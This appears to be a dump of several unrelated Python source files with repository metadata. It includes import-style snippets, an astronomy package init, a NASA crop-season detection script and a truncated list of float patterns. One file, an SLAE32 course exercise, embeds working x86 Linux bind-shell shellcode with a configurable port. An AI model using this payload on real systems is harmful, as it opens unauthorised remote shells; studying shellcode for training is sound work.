In,
This,
Nice,
Split,
Which,
We,
No,
Longer,
Use,
)
from name_of_a_company.extremely_long_project_name.component.ttypes import (
CuteLittleServiceHandlerFactoryyy
)
from name_of_a_company.extremely_long_project_name.extremely_long_component_name.ttypes import *
from .a.b.c.subprocess import *
from . import tasks
from . import A, B, C
from . import (
SomeVeryLongNameAndAllOfItsAdditionalLetters1,
SomeVeryLongNameAndAllOfItsAdditionalLetters2,
)
__all__ = (
base_events.__all__
+ coroutines.__all__
+ events.__all__
+ futures.__all__
+ locks.__all__
+ protocols.__all__
+ runners.__all__
+ queues.__all__
+ streams.__all__
+ tasks.__all__
)
| 21.840708
| 108
| 0.722853
| 291
| 2,468
| 5.676976
| 0.223368
| 0.096852
| 0.061743
| 0.076271
| 0.996368
| 0.996368
| 0.996368
| 0.996368
| 0.996368
| 0.996368
| 0
| 0.007067
| 0.197326
| 2,468
| 112
| 109
| 22.035714
| 0.826855
| 0.114668
| 0
| 0.564706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.423529
| 0
| 0.423529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
0b4560cfa78ddc67b269624087a65c2128a610ce
| 631
|
py
|
Python
|
Assignment1/wrapper_script.py
|
sajithshetty/SLAE32
|
1171a9e3ef78786e069226fcd31ad6d5f2a4057b
|
[
"CC0-1.0"
] | null | null | null |
Assignment1/wrapper_script.py
|
sajithshetty/SLAE32
|
1171a9e3ef78786e069226fcd31ad6d5f2a4057b
|
[
"CC0-1.0"
] | null | null | null |
Assignment1/wrapper_script.py
|
sajithshetty/SLAE32
|
1171a9e3ef78786e069226fcd31ad6d5f2a4057b
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/python
import struct
import sys
#Usage: ./script <port number>
#example ./script.py 4444
x = sys.argv[1]
port = struct.pack("!H", int(x))
bind_shell = ("\x31\xc0\x31\xdb\x50\xb0\x66\xb3\x01\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x52\x66\x68" + port +
"\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80")
print '"' + ''.join('\\x%02x' % ord(c) for c in bind_shell) + '";'
| 35.055556
| 295
| 0.681458
| 133
| 631
| 3.218045
| 0.496241
| 0.084112
| 0.10514
| 0.140187
| 0.203271
| 0.161215
| 0.11215
| 0.11215
| 0
| 0
| 0
| 0.25
| 0.074485
| 631
| 17
| 296
| 37.117647
| 0.482877
| 0.10935
| 0
| 0
| 0
| 0.285714
| 0.694097
| 0.67263
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.285714
| null | null | 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b6e3b69bb3965ed6ea125cfdc7b692c8fbdbc4f
| 308
|
py
|
Python
|
autogalaxy/aggregator/__init__.py
|
Jammy2211/PyAutoModel
|
02f54e71900de9ec12c9070dc00a4bd001b25afa
|
[
"MIT"
] | 4
|
2019-10-29T13:27:23.000Z
|
2020-03-24T11:13:35.000Z
|
autogalaxy/aggregator/__init__.py
|
Jammy2211/PyAutoModel
|
02f54e71900de9ec12c9070dc00a4bd001b25afa
|
[
"MIT"
] | null | null | null |
autogalaxy/aggregator/__init__.py
|
Jammy2211/PyAutoModel
|
02f54e71900de9ec12c9070dc00a4bd001b25afa
|
[
"MIT"
] | 3
|
2020-02-12T10:29:59.000Z
|
2020-03-24T11:13:53.000Z
|
from autogalaxy.aggregator.plane import PlaneAgg
from autogalaxy.aggregator.imaging import ImagingAgg
from autogalaxy.aggregator.fit_imaging import FitImagingAgg
from autogalaxy.aggregator.interferometer import InterferometerAgg
from autogalaxy.aggregator.fit_interferometer import FitInterferometerAgg
| 51.333333
| 74
| 0.886364
| 32
| 308
| 8.46875
| 0.40625
| 0.258303
| 0.442804
| 0.199262
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081169
| 308
| 5
| 75
| 61.6
| 0.957597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0b96e17ade049b24c55fed38fb11489973b00044
| 16,763
|
py
|
Python
|
NASA/Python_codes/drivers/05_SOSDetection_table/03_d_train_tables_JFD.py
|
HNoorazar/Kirti
|
fb7108dac1190774bd90a527aaa8a3cb405f127d
|
[
"MIT"
] | null | null | null |
NASA/Python_codes/drivers/05_SOSDetection_table/03_d_train_tables_JFD.py
|
HNoorazar/Kirti
|
fb7108dac1190774bd90a527aaa8a3cb405f127d
|
[
"MIT"
] | null | null | null |
NASA/Python_codes/drivers/05_SOSDetection_table/03_d_train_tables_JFD.py
|
HNoorazar/Kirti
|
fb7108dac1190774bd90a527aaa8a3cb405f127d
|
[
"MIT"
] | null | null | null |
####
#### last update Nov. 29, 2021
####
"""
This is not efficient. I am doing the following two scenarios in a
sequential fashion.
a. three filters: irrigated fields, NASS out, survey date correct
b. one filter: irrigated fields
The least could be done is do it in parallel fashion!
"""
import csv
import numpy as np
import pandas as pd
import datetime
import time
import os, os.path
# from patsy import cr
import sys
start_time = time.time()
# search path for modules
# look @ https://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path
####################################################################################
###
### Aeolus Core path
###
####################################################################################
sys.path.append('/home/hnoorazar/NASA/')
import NASA_core as nc
import NASA_plot_core as ncp
####################################################################################
###
### Parameters
###
####################################################################################
county = sys.argv[1]
indeks = sys.argv[2]
SEOS_cut = sys.argv[3]
"""
White SOS and EOS params
SEOS_cut will be provided as integers. 3, 4, 5, 35.
Convert to 0.3, 0.4, 0.4, or 0.35
"""
if len(SEOS_cut) == 1:
onset_cut = int(SEOS_cut) / 10.0
elif len(SEOS_cut) == 2:
onset_cut = int(SEOS_cut) / 100.0
offset_cut = onset_cut
print("SEOS_cut is {}.".format(SEOS_cut))
print("onset_cut is {} and offset_cut is {}.".format(onset_cut, offset_cut))
####################################################################################
###
### Aeolus Directories
###
####################################################################################
SF_data_dir = "/data/hydro/users/Hossein/NASA/000_shapefile_data_part/"
data_dir = "/data/hydro/users/Hossein/NASA/05_SG_TS/"
SOS_table_dir = "/data/hydro/users/Hossein/NASA/06_SOS_tables/"
output_dir = SOS_table_dir # + str(int(onset_cut*10)) + "_EOS" + str(int(offset_cut*10)) + "/"
os.makedirs(output_dir, exist_ok=True)
print ("_________________________________________________________")
print ("data dir is: " + data_dir)
print ("_________________________________________________________")
print ("output_dir is: " + output_dir)
print ("_________________________________________________________")
####################################################################################
###
### Read data
###
####################################################################################
SG_df = pd.read_csv(data_dir + "SG_" + county + "_" + indeks + "_JFD.csv")
SG_df['human_system_start_time'] = pd.to_datetime(SG_df['human_system_start_time'])
SG_df["ID"] = SG_df["ID"].astype(str) # Monterays ID will be read as integer, convert to string
"""
train data should be correct. Therefore, we need to filter by
last survey year, toss out NASS, and we are sticking to irrigated
fields for now.
"""
SF_data = pd.read_csv(SF_data_dir + county + ".csv")
SF_data["ID"] = SF_data["ID"].astype(str)
if county == "Monterey2014":
SF_data['Crop2014'] = SF_data['Crop2014'].str.lower().str.replace(" ", "_").str.replace(",", "").str.replace("/", "_")
else:
SF_data['CropTyp'] = SF_data['CropTyp'].str.lower().str.replace(" ", "_").str.replace(",", "").str.replace("/", "_")
if county != "Monterey2014":
# filter by last survey date. Last 4 digits of county name!
print("No. of fields in SF_data is {}.".format(len(SF_data.ID.unique())))
SF_data = nc.filter_by_lastSurvey(SF_data, year = county[-4:])
print("No. of fields in SF_data after survey year is {}.".format(len(SF_data.ID.unique())))
SF_data = nc.filter_out_NASS(SF_data) # Toss NASS
print("No. of fields in SF_data after NASS is {}.".format(len(SF_data.ID.unique())))
SF_data = nc.filter_out_nonIrrigated(SF_data) # keep only irrigated lands
print("No. of fields in SF_data after Irrigation is {}.".format(len(SF_data.ID.unique())))
fuck = list(SF_data.ID)
SG_df = SG_df[SG_df.ID.isin(fuck)]
SG_df = pd.merge(SG_df, SF_data, on=['ID'], how='left')
print ("columns of SG_df right after merging is: ")
print (SG_df.head(2))
####################################################################################
###
### process data
###
####################################################################################
SG_df.reset_index(drop=True, inplace=True)
SG_df = nc.initial_clean(df=SG_df, column_to_be_cleaned = indeks)
### List of unique polygons
polygon_list = SG_df['ID'].unique()
print ("_________________________________________________________")
print("polygon_list is of length {}.".format(len(polygon_list)))
#
# 25 columns
#
ratio_name = indeks + "_ratio"
SEOS_output_columns = ['ID', 'human_system_start_time', indeks,
ratio_name, 'SOS', 'EOS', 'season_count']
#
# The reason I am multiplying len(SG_df) by 4 is that we can have at least two
# seasons which means 2 SOS and 2 EOS. So, at least 4 rows are needed in case of double-cropped.
#
min_year = SG_df.human_system_start_time.dt.year.min()
max_year = SG_df.human_system_start_time.dt.year.max()
no_years = max_year - min_year + 1
all_poly_and_SEOS = pd.DataFrame(data = None,
index = np.arange(4*no_years*len(SG_df)),
columns = SEOS_output_columns)
counter = 0
pointer_SEOS_tab = 0
###########
########### Re-order columns of the read data table to be consistent with the output columns
###########
SG_df = SG_df[SEOS_output_columns[0:3]]
print ("line 144")
for a_poly in polygon_list:
if (counter % 1000 == 0):
print ("_________________________________________________________")
print ("counter: " + str(counter))
print (a_poly)
curr_field = SG_df[SG_df['ID']==a_poly].copy()
curr_field.sort_values(by=['human_system_start_time'], inplace=True)
curr_field.reset_index(drop=True, inplace=True)
# extract unique years. Should be 2008 thru 2021.
# unique_years = list(pd.DatetimeIndex(curr_field['human_system_start_time']).year.unique())
unique_years = curr_field['human_system_start_time'].dt.year.unique()
"""
detect SOS and EOS in each year
"""
for yr in unique_years:
curr_field_yr = curr_field[curr_field['human_system_start_time'].dt.year == yr].copy()
# Orchards EVI was between more than 0.3
y_orchard = curr_field_yr[curr_field_yr['human_system_start_time'].dt.month >= 5]
y_orchard = y_orchard[y_orchard['human_system_start_time'].dt.month <= 10]
y_orchard_range = max(y_orchard[indeks]) - min(y_orchard[indeks])
if y_orchard_range > 0.3:
#######################################################################
###
### find SOS and EOS, and add them to the table
###
#######################################################################
curr_field_yr = nc.addToDF_SOS_EOS_White(pd_TS = curr_field_yr,
VegIdx = indeks,
onset_thresh = onset_cut,
offset_thresh = offset_cut)
##
## Kill false detected seasons
##
curr_field_yr = nc.Null_SOS_EOS_by_DoYDiff(pd_TS=curr_field_yr, min_season_length=40)
#
# extract the SOS and EOS rows
#
SEOS = curr_field_yr[(curr_field_yr['SOS'] != 0) | curr_field_yr['EOS'] != 0]
SEOS = SEOS.copy()
# SEOS = SEOS.reset_index() # not needed really
SOS_tb = curr_field_yr[curr_field_yr['SOS'] != 0]
if len(SOS_tb) >= 2:
SEOS["season_count"] = len(SOS_tb)
# re-order columns of SEOS so they match!!!
SEOS = SEOS[all_poly_and_SEOS.columns]
all_poly_and_SEOS[pointer_SEOS_tab:(pointer_SEOS_tab+len(SEOS))] = SEOS.values
pointer_SEOS_tab += len(SEOS)
else:
# re-order columns of fine_granular_table so they match!!!
curr_field_yr["season_count"] = 1
curr_field_yr = curr_field_yr[all_poly_and_SEOS.columns]
aaa = curr_field_yr.iloc[0].values.reshape(1, len(curr_field_yr.iloc[0]))
all_poly_and_SEOS.iloc[pointer_SEOS_tab:(pointer_SEOS_tab+1)] = aaa
pointer_SEOS_tab += 1
else:
"""
here are potentially apples, cherries, etc.
we did not add EVI_ratio, SOS, and EOS. So, we are missing these
columns in the data frame. So, use 666 as proxy
"""
aaa = np.append(curr_field_yr.iloc[0], [666, 666, 666, 1])
aaa = aaa.reshape(1, len(aaa))
all_poly_and_SEOS.iloc[pointer_SEOS_tab:(pointer_SEOS_tab+1)] = aaa
pointer_SEOS_tab += 1
counter += 1
####################################################################################
###
### Write the outputs
###
####################################################################################
# replace the following line with dropna.
# all_poly_and_SEOS = all_poly_and_SEOS[0:(pointer_SEOS_tab)]
all_poly_and_SEOS.dropna(inplace=True)
out_name = output_dir + "SC_train_" + county + "_" + indeks + str(SEOS_cut) + "_irr_NoNASS_SurvCorrect_JFD.csv"
all_poly_and_SEOS.to_csv(out_name, index = False)
####################################################################################
###
### Do it again with only one filter: Irrigated fields; i.e.
### Forget about NASS and last survey date filter
###
####################################################################################
####################################################################################
###
### Read data
###
####################################################################################
SG_df = pd.read_csv(data_dir + "SG_" + county + "_" + indeks + "_JFD.csv")
SG_df['human_system_start_time'] = pd.to_datetime(SG_df['human_system_start_time'])
SG_df["ID"] = SG_df["ID"].astype(str) # Monterays ID will be read as integer, convert to string
SF_data = pd.read_csv(SF_data_dir + county + ".csv")
SF_data["ID"] = SF_data["ID"].astype(str)
if county == "Monterey2014":
SF_data['Crop2014'] = SF_data['Crop2014'].str.lower().str.replace(" ", "_").str.replace(",", "").str.replace("/", "_")
else:
SF_data['CropTyp'] = SF_data['CropTyp'].str.lower().str.replace(" ", "_").str.replace(",", "").str.replace("/", "_")
if county != "Monterey2014":
SF_data = nc.filter_out_nonIrrigated(SF_data) # keep only irrigated lands
print("No. of fields in SF_data after Irrigation is {}.".format(len(SF_data.ID.unique())))
fuck = list(SF_data.ID)
SG_df = SG_df[SG_df.ID.isin(fuck)]
SG_df = pd.merge(SG_df, SF_data, on=['ID'], how='left')
print ("columns of SG_df right after merging is: ")
print (SG_df.head(2))
####################################################################################
###
### process data
###
####################################################################################
SG_df.reset_index(drop=True, inplace=True)
SG_df = nc.initial_clean(df=SG_df, column_to_be_cleaned = indeks)
### List of unique polygons
polygon_list = SG_df['ID'].unique()
print ("_________________________________________________________")
print("polygon_list is of length {}.".format(len(polygon_list)))
#
# 25 columns
#
ratio_name = indeks + "_ratio"
SEOS_output_columns = ['ID', 'human_system_start_time', indeks,
ratio_name, 'SOS', 'EOS', 'season_count']
#
# The reason I am multiplying len(SG_df) by 4 is that we can have at least two
# seasons which means 2 SOS and 2 EOS. So, at least 4 rows are needed in case of double-cropped.
#
min_year = SG_df.human_system_start_time.dt.year.min()
max_year = SG_df.human_system_start_time.dt.year.max()
no_years = max_year - min_year + 1
all_poly_and_SEOS = pd.DataFrame(data = None,
index = np.arange(4*no_years*len(SG_df)),
columns = SEOS_output_columns)
counter = 0
pointer_SEOS_tab = 0
###########
########### Re-order columns of the read data table to be consistent with the output columns
###########
SG_df = SG_df[SEOS_output_columns[0:3]]
print ("line 144")
for a_poly in polygon_list:
if (counter % 1000 == 0):
print ("_________________________________________________________")
print ("counter: " + str(counter))
print (a_poly)
curr_field = SG_df[SG_df['ID']==a_poly].copy()
curr_field.sort_values(by=['human_system_start_time'], inplace=True)
curr_field.reset_index(drop=True, inplace=True)
# extract unique years. Should be 2008 thru 2021.
# unique_years = list(pd.DatetimeIndex(curr_field['human_system_start_time']).year.unique())
unique_years = curr_field['human_system_start_time'].dt.year.unique()
"""
detect SOS and EOS in each year
"""
for yr in unique_years:
curr_field_yr = curr_field[curr_field['human_system_start_time'].dt.year == yr].copy()
# Orchards EVI was between more than 0.3
y_orchard = curr_field_yr[curr_field_yr['human_system_start_time'].dt.month >= 5]
y_orchard = y_orchard[y_orchard['human_system_start_time'].dt.month <= 10]
y_orchard_range = max(y_orchard[indeks]) - min(y_orchard[indeks])
if y_orchard_range > 0.3:
#######################################################################
###
### find SOS and EOS, and add them to the table
###
#######################################################################
curr_field_yr = nc.addToDF_SOS_EOS_White(pd_TS = curr_field_yr,
VegIdx = indeks,
onset_thresh = onset_cut,
offset_thresh = offset_cut)
##
## Kill false detected seasons
##
curr_field_yr = nc.Null_SOS_EOS_by_DoYDiff(pd_TS=curr_field_yr, min_season_length=40)
#
# extract the SOS and EOS rows
#
SEOS = curr_field_yr[(curr_field_yr['SOS'] != 0) | curr_field_yr['EOS'] != 0]
SEOS = SEOS.copy()
# SEOS = SEOS.reset_index() # not needed really
SOS_tb = curr_field_yr[curr_field_yr['SOS'] != 0]
if len(SOS_tb) >= 2:
SEOS["season_count"] = len(SOS_tb)
# re-order columns of SEOS so they match!!!
SEOS = SEOS[all_poly_and_SEOS.columns]
all_poly_and_SEOS[pointer_SEOS_tab:(pointer_SEOS_tab+len(SEOS))] = SEOS.values
pointer_SEOS_tab += len(SEOS)
else:
# re-order columns of fine_granular_table so they match!!!
curr_field_yr["season_count"] = 1
curr_field_yr = curr_field_yr[all_poly_and_SEOS.columns]
aaa = curr_field_yr.iloc[0].values.reshape(1, len(curr_field_yr.iloc[0]))
all_poly_and_SEOS.iloc[pointer_SEOS_tab:(pointer_SEOS_tab+1)] = aaa
pointer_SEOS_tab += 1
else:
"""
here are potentially apples, cherries, etc.
we did not add EVI_ratio, SOS, and EOS. So, we are missing these
columns in the data frame. So, use 666 as proxy
"""
aaa = np.append(curr_field_yr.iloc[0], [666, 666, 666, 1])
aaa = aaa.reshape(1, len(aaa))
all_poly_and_SEOS.iloc[pointer_SEOS_tab:(pointer_SEOS_tab+1)] = aaa
pointer_SEOS_tab += 1
counter += 1
####################################################################################
###
### Write the outputs
###
####################################################################################
# replace the following line with dropna.
# all_poly_and_SEOS = all_poly_and_SEOS[0:(pointer_SEOS_tab)]
all_poly_and_SEOS.dropna(inplace=True)
out_name = output_dir + "SC_train_" + county + "_" + indeks + str(SEOS_cut) + "_irrOneFilter_JFD.csv"
all_poly_and_SEOS.to_csv(out_name, index = False)
print ("done")
end_time = time.time()
print ("it took {:.0f} minutes to run this code.".format((end_time - start_time)/60))
| 40.588378
| 122
| 0.549365
| 2,088
| 16,763
| 3.943487
| 0.146552
| 0.054651
| 0.048093
| 0.053437
| 0.831066
| 0.826694
| 0.823294
| 0.812728
| 0.805927
| 0.805927
| 0
| 0.016764
| 0.220665
| 16,763
| 412
| 123
| 40.686893
| 0.613518
| 0.166975
| 0
| 0.805128
| 0
| 0
| 0.167644
| 0.089776
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.046154
| 0
| 0.046154
| 0.153846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e7f2582c50c9e73df02f02acbc4b27eda559f68e
| 84,740
|
py
|
Python
|
mysite/patterns/56.py
|
BioinfoNet/prepub
|
e19c48cabf8bd22736dcef9308a5e196cfd8119a
|
[
"MIT"
] | 19
|
2016-06-17T23:36:27.000Z
|
2020-01-13T16:41:55.000Z
|
mysite/patterns/56.py
|
BioinfoNet/prepub
|
e19c48cabf8bd22736dcef9308a5e196cfd8119a
|
[
"MIT"
] | 13
|
2016-06-06T12:57:05.000Z
|
2019-02-05T02:21:00.000Z
|
patterns/56.py
|
OmnesRes/GRIMMER
|
173c99ebdb6a9edb1242d24a791d0c5d778ff643
|
[
"MIT"
] | 7
|
2017-03-28T18:12:22.000Z
|
2021-06-16T09:32:59.000Z
|
pattern_zero=[0.0, 0.017538265306, 0.03443877551, 0.035714285714, 0.050701530612, 0.05325255102, 0.066326530612, 0.070153061224, 0.071428571429, 0.08131377551, 0.086415816327, 0.088966836735, 0.095663265306, 0.102040816327, 0.105867346939, 0.107142857143, 0.109375, 0.117028061224, 0.122130102041, 0.122448979592, 0.124681122449, 0.13137755102, 0.134885204082, 0.137755102041, 0.141581632653, 0.142857142857, 0.145089285714, 0.146683673469, 0.152742346939, 0.157844387755, 0.158163265306, 0.160395408163, 0.167091836735, 0.168367346939, 0.170599489796, 0.173469387755, 0.177295918367, 0.17825255102, 0.178571428571, 0.180803571429, 0.182397959184, 0.1875, 0.188456632653, 0.193558673469, 0.19387755102, 0.196109693878, 0.202806122449, 0.204081632653, 0.20631377551, 0.209183673469, 0.211415816327, 0.213010204082, 0.213966836735, 0.214285714286, 0.216517857143, 0.218112244898, 0.223214285714, 0.224170918367, 0.229272959184, 0.229591836735, 0.231823979592, 0.234375, 0.238520408163, 0.239795918367, 0.242028061224, 0.244897959184, 0.247130102041, 0.248724489796, 0.249681122449, 0.25, 0.252232142857, 0.253826530612, 0.258928571429, 0.259885204082, 0.264987244898, 0.265306122449, 0.267538265306, 0.270089285714, 0.274234693878, 0.275510204082, 0.277742346939, 0.280612244898, 0.282844387755, 0.28443877551, 0.285395408163, 0.285714285714, 0.287946428571, 0.289540816327, 0.294642857143, 0.295599489796, 0.300701530612, 0.301020408163, 0.30325255102, 0.305803571429, 0.309948979592, 0.311224489796, 0.313456632653, 0.316326530612, 0.318558673469, 0.320153061224, 0.321109693878, 0.321428571429, 0.323660714286, 0.325255102041, 0.330357142857, 0.33131377551, 0.336415816327, 0.336734693878, 0.338966836735, 0.341517857143, 0.345663265306, 0.34693877551, 0.349170918367, 0.352040816327, 0.354272959184, 0.355867346939, 0.356823979592, 0.357142857143, 0.359375, 0.360969387755, 0.366071428571, 0.367028061224, 0.372130102041, 0.372448979592, 0.374681122449, 0.377232142857, 0.38137755102, 0.382653061224, 0.384885204082, 0.387755102041, 0.389987244898, 0.391581632653, 0.392538265306, 0.392857142857, 0.395089285714, 0.396683673469, 0.401785714286, 0.402742346939, 0.407844387755, 0.408163265306, 0.410395408163, 0.412946428571, 0.417091836735, 0.418367346939, 0.420599489796, 0.423469387755, 0.425701530612, 0.427295918367, 0.42825255102, 0.428571428571, 0.430803571429, 0.432397959184, 0.4375, 0.438456632653, 0.443558673469, 0.44387755102, 0.446109693878, 0.448660714286, 0.452806122449, 0.454081632653, 0.45631377551, 0.459183673469, 0.461415816327, 0.463010204082, 0.463966836735, 0.464285714286, 0.466517857143, 0.468112244898, 0.473214285714, 0.474170918367, 0.479272959184, 0.479591836735, 0.481823979592, 0.484375, 0.488520408163, 0.489795918367, 0.492028061224, 0.494897959184, 0.497130102041, 0.498724489796, 0.499681122449, 0.5, 0.502232142857, 0.503826530612, 0.508928571429, 0.509885204082, 0.514987244898, 0.515306122449, 0.517538265306, 0.520089285714, 0.524234693878, 0.525510204082, 0.527742346939, 0.530612244898, 0.532844387755, 0.53443877551, 0.535395408163, 0.535714285714, 0.537946428571, 0.539540816327, 0.544642857143, 0.545599489796, 0.550701530612, 0.551020408163, 0.55325255102, 0.555803571429, 0.559948979592, 0.561224489796, 0.563456632653, 0.566326530612, 0.568558673469, 0.570153061224, 0.571109693878, 0.571428571429, 0.573660714286, 0.575255102041, 0.580357142857, 0.58131377551, 0.586415816327, 0.586734693878, 0.588966836735, 0.591517857143, 0.595663265306, 0.59693877551, 0.599170918367, 0.602040816327, 0.604272959184, 0.605867346939, 0.606823979592, 0.607142857143, 0.609375, 0.610969387755, 0.616071428571, 0.617028061224, 0.622130102041, 0.622448979592, 0.624681122449, 0.627232142857, 0.63137755102, 0.632653061224, 0.634885204082, 0.637755102041, 0.639987244898, 0.641581632653, 0.642538265306, 0.642857142857, 0.645089285714, 0.646683673469, 0.651785714286, 0.652742346939, 0.657844387755, 0.658163265306, 0.660395408163, 0.662946428571, 0.667091836735, 0.668367346939, 0.670599489796, 0.673469387755, 0.675701530612, 0.677295918367, 0.67825255102, 0.678571428571, 0.680803571429, 0.682397959184, 0.6875, 0.688456632653, 0.693558673469, 0.69387755102, 0.696109693878, 0.698660714286, 0.702806122449, 0.704081632653, 0.70631377551, 0.709183673469, 0.711415816327, 0.713010204082, 0.713966836735, 0.714285714286, 0.716517857143, 0.718112244898, 0.723214285714, 0.724170918367, 0.729272959184, 0.729591836735, 0.731823979592, 0.734375, 0.738520408163, 0.739795918367, 0.742028061224, 0.744897959184, 0.747130102041, 0.748724489796, 0.749681122449, 0.75, 0.752232142857, 0.753826530612, 0.758928571429, 0.759885204082, 0.764987244898, 0.765306122449, 0.767538265306, 0.770089285714, 0.774234693878, 0.775510204082, 0.777742346939, 0.780612244898, 0.782844387755, 0.78443877551, 0.785395408163, 0.785714285714, 0.787946428571, 0.789540816327, 0.794642857143, 0.795599489796, 0.800701530612, 0.801020408163, 0.80325255102, 0.805803571429, 0.809948979592, 0.811224489796, 0.813456632653, 0.816326530612, 0.818558673469, 0.820153061224, 0.821109693878, 0.821428571429, 0.823660714286, 0.825255102041, 0.830357142857, 0.83131377551, 0.836415816327, 0.836734693878, 0.838966836735, 0.841517857143, 0.845663265306, 0.84693877551, 0.849170918367, 0.852040816327, 0.854272959184, 0.855867346939, 0.856823979592, 0.857142857143, 0.859375, 0.860969387755, 0.866071428571, 0.867028061224, 0.872130102041, 0.872448979592, 0.874681122449, 0.877232142857, 0.88137755102, 0.882653061224, 0.884885204082, 0.887755102041, 0.889987244898, 0.891581632653, 0.892538265306, 0.892857142857, 0.895089285714, 0.896683673469, 0.901785714286, 0.902742346939, 0.907844387755, 0.908163265306, 0.910395408163, 0.912946428571, 0.917091836735, 0.918367346939, 0.920599489796, 0.923469387755, 0.925701530612, 0.927295918367, 0.92825255102, 0.928571428571, 0.930803571429, 0.932397959184, 0.9375, 0.938456632653, 0.943558673469, 0.94387755102, 0.946109693878, 0.948660714286, 0.952806122449, 0.954081632653, 0.95631377551, 0.959183673469, 0.961415816327, 0.963010204082, 0.963966836735, 0.964285714286, 0.966517857143, 0.968112244898, 0.973214285714, 0.974170918367, 0.979272959184, 0.979591836735, 0.981823979592, 0.984375, 0.988520408163, 0.989795918367, 0.992028061224, 0.994897959184, 0.997130102041, 0.998724489796, 0.999681122449]
pattern_odd=[0.0, 0.002232142857, 0.003826530612, 0.008928571429, 0.009885204082, 0.014987244898, 0.015306122449, 0.017538265306, 0.020089285714, 0.024234693878, 0.025510204082, 0.027742346939, 0.030612244898, 0.032844387755, 0.03443877551, 0.035395408163, 0.035714285714, 0.037946428571, 0.039540816327, 0.044642857143, 0.045599489796, 0.050701530612, 0.051020408163, 0.05325255102, 0.055803571429, 0.059948979592, 0.061224489796, 0.063456632653, 0.066326530612, 0.068558673469, 0.070153061224, 0.071109693878, 0.071428571429, 0.073660714286, 0.075255102041, 0.080357142857, 0.08131377551, 0.086415816327, 0.086734693878, 0.088966836735, 0.091517857143, 0.095663265306, 0.09693877551, 0.099170918367, 0.102040816327, 0.104272959184, 0.105867346939, 0.106823979592, 0.107142857143, 0.109375, 0.110969387755, 0.116071428571, 0.117028061224, 0.122130102041, 0.122448979592, 0.124681122449, 0.127232142857, 0.13137755102, 0.132653061224, 0.134885204082, 0.137755102041, 0.139987244898, 0.141581632653, 0.142538265306, 0.142857142857, 0.145089285714, 0.146683673469, 0.151785714286, 0.152742346939, 0.157844387755, 0.158163265306, 0.160395408163, 0.162946428571, 0.167091836735, 0.168367346939, 0.170599489796, 0.173469387755, 0.175701530612, 0.177295918367, 0.17825255102, 0.178571428571, 0.180803571429, 0.182397959184, 0.1875, 0.188456632653, 0.193558673469, 0.19387755102, 0.196109693878, 0.198660714286, 0.202806122449, 0.204081632653, 0.20631377551, 0.209183673469, 0.211415816327, 0.213010204082, 0.213966836735, 0.214285714286, 0.216517857143, 0.218112244898, 0.223214285714, 0.224170918367, 0.229272959184, 0.229591836735, 0.231823979592, 0.234375, 0.238520408163, 0.239795918367, 0.242028061224, 0.244897959184, 0.247130102041, 0.248724489796, 0.249681122449, 0.25, 0.252232142857, 0.253826530612, 0.258928571429, 0.259885204082, 0.264987244898, 0.265306122449, 0.267538265306, 0.270089285714, 0.274234693878, 0.275510204082, 0.277742346939, 0.280612244898, 0.282844387755, 0.28443877551, 0.285395408163, 0.285714285714, 0.287946428571, 0.289540816327, 0.294642857143, 0.295599489796, 0.300701530612, 0.301020408163, 0.30325255102, 0.305803571429, 0.309948979592, 0.311224489796, 0.313456632653, 0.316326530612, 0.318558673469, 0.320153061224, 0.321109693878, 0.321428571429, 0.323660714286, 0.325255102041, 0.330357142857, 0.33131377551, 0.336415816327, 0.336734693878, 0.338966836735, 0.341517857143, 0.345663265306, 0.34693877551, 0.349170918367, 0.352040816327, 0.354272959184, 0.355867346939, 0.356823979592, 0.357142857143, 0.359375, 0.360969387755, 0.366071428571, 0.367028061224, 0.372130102041, 0.372448979592, 0.374681122449, 0.377232142857, 0.38137755102, 0.382653061224, 0.384885204082, 0.387755102041, 0.389987244898, 0.391581632653, 0.392538265306, 0.392857142857, 0.395089285714, 0.396683673469, 0.401785714286, 0.402742346939, 0.407844387755, 0.408163265306, 0.410395408163, 0.412946428571, 0.417091836735, 0.418367346939, 0.420599489796, 0.423469387755, 0.425701530612, 0.427295918367, 0.42825255102, 0.428571428571, 0.430803571429, 0.432397959184, 0.4375, 0.438456632653, 0.443558673469, 0.44387755102, 0.446109693878, 